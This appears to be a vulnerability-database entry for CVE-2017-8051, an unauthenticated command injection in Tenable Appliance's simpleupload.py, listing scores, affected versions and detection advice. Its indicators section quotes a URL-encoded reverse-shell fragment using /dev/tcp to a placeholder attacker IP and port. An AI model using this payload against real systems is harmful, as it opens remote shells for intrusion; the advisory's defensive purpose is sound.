cbcvebase.
CVE-2017-8051
published 2017-04-21

CVE-2017-8051: Tenable Appliance 3.5 - 4.4.0, and possibly prior versions, contains a flaw in the simpleupload.py script in the Web UI. Through the manipulation of the…

PriorityP272critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
16.48%
96.6th percentile
Tenable Appliance 3.5 - 4.4.0, and possibly prior versions, contains a flaw in the simpleupload.py script in the Web UI. Through the manipulation of the tns_appliance_session_user parameter, a remote attacker can inject arbitrary commands.

Affected

11 ranges
VendorProductVersion rangeFixed in
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance
tenableappliance

Detection & IOCsextracted from sources · hover to see the quote

path/simpleupload.py
command/dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '
  • Monitor HTTP requests to /simpleupload.py for manipulation of the `tns_appliance_session_user` parameter, particularly values containing shell metacharacters (e.g., `&`, `|`, `;`, `%26`, `%0a`) indicative of command injection.
  • Look for URL-encoded shell payloads in the `tns_appliance_session_user` parameter, specifically `%26` (ampersand) and `%0a` (newline) used to chain commands and establish reverse shells via `/dev/tcp`.
  • A public exploit for this RCE was published on 2017-04-18 by researcher 'agix'; treat any exploitation attempts against /simpleupload.py after this date as active in-the-wild exploitation.
  • ·All Tenable Appliance versions in the 3.x and 4.x lines are affected (3.4.0, 3.5.0, 3.5.1, 3.10.0, 3.10.1, 4.0.0, 4.1.0, 4.2.0, 4.3.0, 4.3.1, 4.4.0); the vulnerability is exploitable without authentication.
  • ·Tenable strongly recommends the appliance be placed on a non-Internet-addressable subnet to reduce exposure to this unauthenticated RCE.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.